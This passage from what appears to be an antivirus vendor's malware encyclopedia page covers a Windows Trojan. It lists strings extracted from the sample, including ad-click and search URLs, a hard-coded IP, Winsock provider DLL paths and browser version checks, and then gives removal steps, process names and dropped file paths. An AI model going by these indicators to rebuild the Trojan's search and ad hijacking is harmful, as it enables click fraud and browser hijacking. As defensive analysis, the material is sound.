8.8</pre><pre>8.8.8.9</pre><pre>8.8.4.4</pre><pre>Shell.Dusn</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}</pre><pre>xxxxxx</pre><pre>http://www.baidu.com/adrc.php?</pre><pre>http://www.baidu.com/baidu.php?</pre><pre>http://www.baidu.com/s?</pre><pre>http://www.hao123.com/?</pre><pre>http://123.sogou.com/?</pre><pre>http://www.sogou.com/img/fav.ico?</pre><pre>http://pv.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/cl.gif?</pre><pre>http://www.google.com/aclk?</pre><pre>http://www.sogou.com/bill_</pre><pre>http://www.sogou.com/sogou?</pre><pre>http://test.hermes.sogou.com/sa.gif?</pre><pre>http://www.sogou.com/index.htm</pre><pre>118.145.16.80</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>shdocvw.dll</pre><pre>ieframe.dll</pre><pre>http://www.sogou.com/sogou?query=</pre><pre>sogou-netb-xx-d</pre><pre>%%X</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>HttpAddRequestHeaders</pre><pre>\StringFileInfo\xx\%s</pre><pre>user32.dll</pre><pre>6.0.2800.1106</pre><pre>6.00.2600.0000</pre><pre>6.00.2600.0000 
(xpclient.010817-1148)</pre><pre>6.00.2737.800</pre><pre>6.00.2800.1106</pre><pre>6.00.2800.1106 (xpsp1.020828-1920)</pre><pre>6.00.2800.1400</pre><pre>6.00.2800.1485</pre><pre>6.00.2800.1496</pre><pre>6.00.2800.1603</pre><pre>6.00.2800.1607</pre><pre>6.00.2800.1611</pre><pre>6.00.2800.1615</pre><pre>6.00.2800.1617</pre><pre>6.00.2800.1623</pre><pre>6.00.2800.1627</pre><pre>6.00.2800.1632</pre><pre>6.00.2800.1644</pre><pre>6.00.2800.1649</pre><pre>6.00.2800.1650</pre><pre>6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)</pre><pre>6.00.2900.2518 (xpsp.040919-1030)</pre><pre>6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)</pre><pre>6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)</pre><pre>6.00.2900.2598 (xpsp.041130-1728)</pre><pre>6.00.2900.2627 (xpsp.050309-1719)</pre><pre>6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)</pre><pre>6.00.2900.2668 (xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 
(xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 
(xpsp_sp3_qfe.080417-1431)</pre></div><div class=" blog_tab /><p><strong class="font_20"><span style="font-size:medium;">Remove it with Ad-Aware</span></strong></p><ol><li>Click (<a href="http://lavasoft.com/thankyou.php?internal=true&inter=encyclopedia"><span style="color: #0000ff;">here</span></a>) to download and install Ad-Aware Free Antivirus.</li><li>Update the definition files.</li><li>Run a full scan of your computer.</li></ol><p><strong class="font_20"><span style="font-size:medium;">Manual removal*</span></strong></p><ol><li>Scan a system with an anti-rootkit tool.<br /></li><li>Terminate malicious process(es) (<a href="http://www.lavasoft.com/mylavasoft/malware-removal-support/blog/how-to-end-a-process-with-the-task-manager"><span style="color: #0000ff;">How to End a Process With the Task Manager</span></a>):<p style="padding-left: 30px; font-size: x-small; color: #ff0000;">EXE_temp1.EXE:308<br />shock.exe:3516<br />taskkill.exe:1700<br />EXE_temp4.EXE:1516<br />ping.exe:1580<br />ping.exe:1416<br />svchots.exe:3760<br />EXE_temp2.exe:1176<br />huodongtongzhi.exe:1032<br />netsh.exe:3916<br />MiniIE.exe:3436<br />qtool.exe:3460<br />EXE_temp0.exe:980<br />wpzir.exe:3300<br />%original file name%.exe:1040<br /></p></li><li>Delete the original Trojan file.<br /></li><li>Delete or disinfect the following files created/modified by the Trojan:<p style="padding-left: 30px; font-size: x-small; color: 
#ff0000;">%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)<br />%WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)<br />%WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)<br />%WinDir%\JMt\sys32\shock.dll (845 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)<br />%Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)<br />%WinDir%\JMt\win32\DPro.sys (784 bytes)<br />%WinDir%\JMt\win32\reTcp.sys (196 bytes)<br />%WinDir%\JMt\win32\config.ini (46 bytes)<br />%WinDir%\JMt\win32\rename.exe (5480 bytes)<br />%Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)<br />%WinDir%\share\kbdf.dat (122 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 
bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)<br />%Documents and Settings%\%current user%\Desktop\Ê·ÉÃÂÂ×î¾¢±¬ÓÎ÷.lnk (1 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)<br />%WinDir%\share\ico.dll (129 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)<br />%System%\DqKgbb.dll (141 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)<br />%Documents and Settings%\%current user%\Desktop\³ÉÈËÓÎ÷.lnk (1 bytes)<br />%WinDir%\share\rsvp\objs.exe (52 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)<br />%WinDir%\JMt\wpzir.exe (41 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)<br />%WinDir%\JMt\sys32\whitelist.txt (3 bytes)<br />%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)<br />%WinDir%\JMt\win32\svchots.txt (70868 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)<br />%WinDir%\JMt\sys32\shock.txt (18796 bytes)<br />%WinDir%\JMt\sys32\whitelist.dat (2 bytes)<br 
/>%WinDir%\JMt\sys32\qtool.exe (155 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)<br />%WinDir%\JMt\First.txt (6988 bytes)<br />%WinDir%\JMt\flist.bin (620 bytes)<br />%WinDir%\JMt\sys32\shock.exe (111 bytes)<br />%WinDir%\JMt\sys32\qtool.txt (26868 bytes)<br />%System%\drivers\HideSys.sys (15 bytes)<br />%WinDir%\JMt\win32\svchots.exe (1695 bytes)<br />%WinDir%\JMt\MiniIE.txt (46228 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)<br />%WinDir%\JMt\MiniIE.exe (272 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)</p></li><li>Clean the Temporary Internet Files folder, which may contain infected files (<a href="http://www.lavasoft.com/mylavasoft/malware-removal-support/blog/how-to-clean-the-temporary-internet-files-folder"><span style="color: #0000ff;">How to clean Temporary Internet Files folder</span></a>).<br /></li><li>Reboot the computer.<br /></li></ol>*Manual removal may cause unexpected system behaviour and should be performed at your own risk.</head></html></pre></head></html></pre></head></html></pre></hsT-y>